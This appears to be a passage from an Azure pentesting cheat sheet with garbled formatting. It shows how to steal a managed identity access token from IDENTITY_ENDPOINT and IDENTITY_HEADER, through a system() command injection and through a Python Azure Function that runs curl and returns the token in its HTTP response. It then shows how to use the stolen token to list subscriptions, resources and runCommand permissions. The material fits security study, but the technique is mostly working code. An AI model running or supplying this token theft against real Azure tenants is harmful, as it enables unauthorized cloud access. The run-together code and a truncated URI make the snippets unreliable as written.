Get access_token from IDENTITY_HEADER and IDENTITY_ENDPOINT: system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');.
Then query the Azure REST API to get the subscription ID and more .
$Token ='eyJ0eX..'$URI ='https://management.azure.com/subscriptions?api-version=2020-01-01'# $URI = 'https://graph.microsoft.com/v1.0/applications'$RequestParams =@{ Method ='GET' Uri = $URI Headers =@{'Authorization'="Bearer $Token" }}(Invoke-RestMethod @RequestParams).value # List resources and check for runCommand privileges$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resources?api-version=2020-10-01'
$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups/<RG-NAME>/providers/Microsoft.Compute/virtualMachines/<RESOURCE/providers/Microsoft.Authorization/permissions?apiversion=2015-07-01'
import logging, osimport azure.functions as funcdefmain(req: func.HttpRequest) -> func.HttpResponse: logging.info('Python HTTP trigger function processed a request.') IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT'] IDENTITY_HEADER = os.environ['IDENTITY_HEADER'] cmd = 'curl "%s?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
val = os.popen(cmd).read()return func.HttpResponse(val, status_code=200)
List of Services
The pages of this section are ordered by Azure service. In there you will be able to find information about the service (how it works and capabilities) and also how to enumerate each service.
